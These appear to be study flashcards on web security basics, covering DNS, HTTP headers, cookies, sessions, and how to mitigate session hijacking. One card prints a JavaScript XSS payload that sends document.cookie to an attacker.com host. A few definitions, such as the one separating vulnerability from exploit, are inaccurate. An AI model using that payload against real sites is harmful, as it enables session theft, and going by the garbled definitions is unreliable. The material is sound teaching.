CS 253 Web Security Youtube Pt1 Flashcards

(223 cards)

1
Q

What is the difference between a vulnerability and an exploit?

A

A vulnerability is a part of the site that makes it behave unexpectedly but does not allow one to insert malicious code, unlike an exploit

2
Q

What reasons are there to attack a computer system?

A

Spam - To trick people into clicking things

Denial of service - To attack competitors or seek ransom

Infect visiting users with malware - infect one server, use it to infect hundreds of thousands of clients

Data theft - credentials, credit card numbers, intellectual property

Mine cryptocurrency

Ransomware

Political motivations

3
Q

What does web security involve?

A

Browser security, server app security, client app security

It also involves actions to protect the user from:
- Social engineering
- Trackers (private data being leaked)

4
Q

Why is web security hard?

A
  • The web wants to provide the ability to run anyone’s code on your computer securely. Run untrusted code securely.
  • Different sites may interact with each other
  • Websites have a lot of low-level features (hardware access)
  • There is a desire for high performance
  • APIs for web browsers were not designed from first principles. They have evolved
  • Web has strict backwards compatibility requirements. There can be no changes that break previous versions because they could break websites.
5
Q

What can websites do that constitute very high security risks?

A
  • Download content from anywhere
  • Spawn worker processes
  • Open sockets to a server, or even to another user’s browser
  • Display media in a huge number of formats
  • Run custom code on the GPU
  • Save/read data from the filesystem
6
Q

What does DNS stand for?

A

Domain Name System

7
Q

What is the Domain Name System?

A

A system that translates user-friendly domain names into IP addresses

8
Q

How does DNS querying work?

A

The client machine sends the domain name to the DNS server and the server responds with the corresponding IP address.

9
Q

How does the DNS server work when performing a DNS query?

A

The client machine sends the domain name to the DNS server.

The DNS server uses the DNS Recursive Resolver to look up the answer for the domain name. It will continually perform queries to different servers asking if they have information on the domain name, until it gets a positive response.

The queried servers are called nameservers and there are multiple because one of them cannot allocate all of the existing domain names.

10
Q

What is a good example of a DNS querying process?

A

Let’s say we try to access the URL: https://www.stanford.edu

The client sends the domain name (stanford.edu) to the DNS Server.

The DNS Server, using the DNS Recursive Resolver, queries the Root Nameserver. The Root Nameserver does not have the IP address, so it responds with the instruction to query the “.edu” Nameserver.

The DNS Recursive Resolver queries the “.edu” Nameserver. The “.edu” Nameserver does not have the IP address, so it responds with the instruction to query the “stanford.edu” Nameserver.

The DNS Recursive Resolver queries the “stanford.edu” Nameserver. The “stanford.edu” Nameserver does have the IP address, so it returns it.

The DNS Recursive Resolver returns the received IP address to the Client.

11
Q

What is a TLD Nameserver?

A

It’s the nameserver that holds all instructions or addresses for a top-level domain.
Example:
.com
.org
.edu

12
Q

What does the TLD in a TLD Nameserver stand for?

A

Top-Level Domain Nameserver

13
Q

What is a top-level domain?

A

It is the part of the domain name after the dot that is used to indicate the type or category of a website.
Examples:
.com
.org
.edu

14
Q

What does SLD stand for, regarding domain names?

A

Second-Level Domain

15
Q

What is a second-level domain?

A

It is the part of the domain name before the dot that indicates the name of the website
Examples:

wikipedia.com = wikipedia
brainscape.com = brainscape

16
Q

What is a Domain Nameserver?

A

The Nameserver that holds the information regarding a particular domain name

17
Q

What is DNS hijacking?

A

The attacker changes the target’s DNS records to point to the attacker’s own IP address. After this, all site visitors will be directed to the attacker’s web server.

18
Q

What are the vectors (places) where DNS hijacking can occur?

A
  • Malware changes user’s local DNS settings
  • Hacked recursive DNS resolver
  • Hacked router
  • Hacked DNS nameserver
  • Compromised user account at DNS provider
19
Q

What does ISP stand for?

A

Internet Service Provider

20
Q

Why is it easy for ISPs to sell lists of the DNS names you have queried?

A

Because the queries are in plaintext.

21
Q

What can you do to try and avoid ISPs selling your DNS query lists?

A

You can consider switching your DNS setting to use the Cloudflare server or any other provider that at least has a good privacy policy.

22
Q

What do HTTP Status Codes mean in general?

A

1xx - Informational, you need to hold on some time
2xx - Success
3xx - Redirection
4xx - Client error
5xx - Server error

23
Q

What are some well-known HTTP Success status codes?

A

200 - Ok - Request succeeded
204 - No Content - Request succeeded but answer is empty
206 - Partial Content - Request for specific byte range succeeded

24
Q

What are some well-known HTTP Redirection status codes?

A

301 - Moved Permanently - Resource has a new permanent URL
302 - Found - Resource temporarily resides at a different URL
304 - Not Modified - Resource has not been modified since last cached

25
Q

What are some well-known HTTP Client error codes?

A

400 - Bad Request - The request was malformed
401 - Unauthorized - Resource is protected, need to authorize
403 - Forbidden - Resource is protected, denying access
404 - Not Found - Resource was not found

26
Q

What are some well-known HTTP Server error codes?

A

500 - Internal Server Error - Generic server error
502 - Bad Gateway - Server is a proxy; backend server is unreachable
503 - Service Unavailable - Server is overloaded or down for maintenance
504 - Gateway Timeout - Server is a proxy; backend server responded too slowly

27
Q

What can an HTTP Proxy server do or be useful for?

A

It can:
- Cache content
- Block content (malware, adult content, etc.)
- Modify content
- Sit in front of many servers (reverse proxy)

28
Q

What is a client-side proxy?

A

It’s a proxy that sits between the client and the web, retrieving resources from the internet. It is often used in corporate networks to control employee internet access, enforce content filters, and improve security.

29
Q

What is another name for a client-side proxy?

A

Forward proxy

30
Q

What is another name for a forward proxy?

A

A client-side proxy

31
Q

What are the HTTP headers and what are they good for?

A

They are essentially a map of key-value pairs. They let the client and the server pass additional information with an HTTP request or response, and therefore allow experimental extensions to be added to HTTP without requiring protocol changes.

32
Q

What are 11 of the most useful HTTP request headers?

A

Host
User-Agent
Referer
Cookie
Range
Cache-Control
If-Modified-Since
Connection
Accept
Accept-Encoding
Accept-Language

33
Q

What is the Host HTTP request header used for?

A

It is meant to contain the domain name of the server

34
Q

What is the User-Agent HTTP request header used for?

A

It is meant to contain the name of the browser and operating system. Technically it contains not the name of the browser, but the name of the User Agent, which is normally the browser.

35
Q

What is the Referer HTTP request header used for?

A

It is meant to contain the webpage which led you to this page. (The word Referer is misspelled, but that’s how it is written in HTTP.)

36
Q

What is the Cookie HTTP request header used for?

A

It is meant to carry the cookie the server gave you earlier. This helps to keep you logged in.

37
Q

What is the Range HTTP request header used for?

A

Specifies a subset of bytes to fetch. This is the same Range concept that is used for the HTTP 206 response status code.

38
Q

What is the Cache-Control HTTP request header used for?

A

Helps to specify whether you want a cached response or not.

39
Q

What is the If-Modified-Since HTTP request header used for?

A

Allows you to specify a datetime so that the response will only be updated if the resource has been modified since that datetime.

40
Q

What is the Connection HTTP request header used for?

A

Sends instructions to control the TCP socket used for the request, either to keep it open or to close it. (keep-alive, close)

41
Q

What is the Accept HTTP request header used for?

A

You can specify which type of response you will accept.
Example: text/html

42
Q

What is the Accept-Encoding HTTP request header used for?

A

You can specify which encoding algorithms you understand.
Example: gzip

43
Q

What is the Accept-Language HTTP request header used for?

A

You can specify which language you expect.
Example: es, en

44
Q

What are 12 of the most useful HTTP response headers?

A

Date
Last-Modified
Cache-Control
Expires
Vary
Set-Cookie
Location
Connection
Content-Type
Content-Encoding
Content-Language
Content-Length

45
Q

What is the Date HTTP response header used for?

A

It contains when the response was sent.

46
Q

What is the Last-Modified HTTP response header used for?

A

It contains when the content was last modified.

47
Q

What is the Cache-Control HTTP response header used for?

A

It specifies whether you want the client to cache the response or not

48
Q

What is the Expires HTTP response header used for?

A

Contains a date to point out when the browser should discard the response from cache.

49
Q

What is the Vary HTTP response header used for?

A

Contains a list of request headers which affect the response. The browser will save this list and check those headers in new requests; if they are different it will not use the cached version, otherwise it will use it.

50
Q

What is the Set-Cookie HTTP response header used for?

A

Sets a cookie value on the client

51
Q

What is the Location HTTP response header used for?

A

Used to redirect the client to another URL. This has to be used alongside a 3xx response.

52
Q

What is the Connection HTTP response header used for?

A

Confirms the HTTP request header counterpart

53
Q

What is the Content-Type HTTP response header used for?

A

Confirms the HTTP request header counterpart

54
Q

What is the Content-Encoding HTTP response header used for?

A

Confirms the HTTP request header counterpart

55
Q

What is the Content-Language HTTP response header used for?

A

Confirms the HTTP request header counterpart

56
Q

What is the Content-Length HTTP response header used for?

A

Confirms the HTTP request header counterpart

57
Q

What does HTTP stand for?

A

Hypertext Transfer Protocol

58
Q

What does TLS stand for?

A

Transport Layer Security

59
Q

What does TCP stand for?

A

Transmission Control Protocol

60
Q

What does IP stand for?

A

Internet Protocol

61
Q

What does the client need to do in order to find the IP of the site it wants to connect to?

A

It needs to request it through the DNS Server using the domain name

62
Q

What does the client do after getting the IP address?

A

It opens a connection using TCP

63
Q

What does the client do after opening the TCP connection?

A

It applies TLS encryption, although it is optional

64
Q

What does the client do after opening the TCP connection and applying (or not) the TLS encryption?

A

It makes the HTTP request by using the socket opened by TCP.

65
Q

What happens when you type a URL and press enter?

A

1. Performs a DNS lookup on the hostname (example.com) to get an IP address (1.2.3.4)
2. Opens a TCP socket to 1.2.3.4 on port 80 (the HTTP port)
3. Sends an HTTP request that includes the desired path
4. Reads the HTTP response from the socket
5. Parses the HTML into the DOM
6. Renders the page based on the DOM
7. Repeats until all external resources are loaded:
- If there are pending external resources, makes HTTP requests for these (runs steps 1-4)
- Renders the resources into the page

66
Q

What is the syntax for a server to set a cookie on a client?

A

Set-Cookie: theme=dark;

67
Q

What is the syntax for a client to send a cookie to the server?

A

Cookie: theme=dark;

68
Q

What is a session?

A

The method in which a server keeps a set of data related to a user’s current “browsing session”

69
Q

What are some examples in which sessions are commonly implemented?

A

Logins
Shopping carts
User tracking

70
Q

What does the term “Access Control” refer to?

A

To the act of regulating who can view resources in a web site or take actions.

71
Q

What does the term “Ambient Authority” refer to?

A

To implementing Access Control based on a global and persistent property of the requester.

72
Q

Which types of Ambient Authority exist on the web?

A

4 in total:
Cookies - the most common and most versatile method
IP checking - used at Stanford for library resources
Built-in HTTP Authentication - rarely used
Client Certificates - rarely used

73
Q

What are the signature schemes normally used for implementing Ambient Authority with Cookies?

A

The triple of algorithms:
- Generator
- Signer
- Verifier

74
Q

What does the Generator function do?

A

It does not receive any input and returns a primary key and a secret key

75
Q

What does the Signer function do?

A

Receives the secret key and a value. It uses the secret key to perform a series of operations on the value and returns a value called the tag (which is the signed value).

76
Q

What does the Verifier function do?

A

It receives the primary key, the original value and the signed value. Internally it performs a series of operations in order to check the validity of the tag generated from the original value.

77
Q

How does the process of requests work using Ambient Authority with Cookies?

A

1. The server generates the pk and sk
2. The browser sends a POST login request
3. The server validates the user and password
4. The server signs the username value and generates a tag
5. The server sends back the tag and the username as cookies with the Set-Cookie header
6. The browser sets both cookies as instructed by the server
7. The browser sends future requests with both username and tag in the Cookie header
8. The server validates whether the tag and username are valid for one another

78
Q

What are some cookie attributes you can specify?

A

Expires - Specifies an expiration date. If no date is given, the cookie lasts for a session
Path - Scopes the “Cookie” header to a particular request path prefix
Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header

79
Q

What is the format for the Set-Cookie header sent by the server?

A

Example: Set-Cookie: theme=dark;Expires=;

80
Q

How does Session hijacking work?

A

When cookies are sent over unencrypted HTTP, anyone can intercept them and use them to hijack the user’s session. Once the attacker has the cookie, he can send the victim’s cookie as if it were his own and the server will be fooled into thinking he is the owner of the session.

81
Q

How can you mitigate a Session hijacking attack?

A

1. You can add the Secure cookie attribute to prevent the cookie from being sent over unencrypted HTTP connections.
Set-Cookie: key=value; Secure
2. You use HTTPS over the entire website

82
Q

Why does using HTTPS mitigate a Session hijacking attack?

A

Because the data transferred during HTTPS communication is encrypted.

83
Q

What is a very common form of JS code used in Session hijacking via Cross Site Scripting?

A

new Image().src = 'https://attacker.com/steal?cookie=' + document.cookie

84
Q

What does XSS stand for?

A

Cross Site Scripting

85
Q

What can you do to protect your cookies from XSS?

A

You can add the attribute HttpOnly to your Set-Cookie header. This way the cookies will not be accessible through JavaScript, only through HTTP.
Set-Cookie: key=value; Secure; HttpOnly

86
Q

Why would one attempt to use the Path attribute for security?

A

Because the Path attribute allows you to limit the sharing of a cookie to only a specific URL path, and therefore on paper it wouldn’t allow other unwanted paths to access the cookie.

87
Q

Why is it not recommended to use the Path attribute for security?

A

Because the Path attribute does not protect against unauthorized reading of the cookie from a different path on the same origin. It can be bypassed using an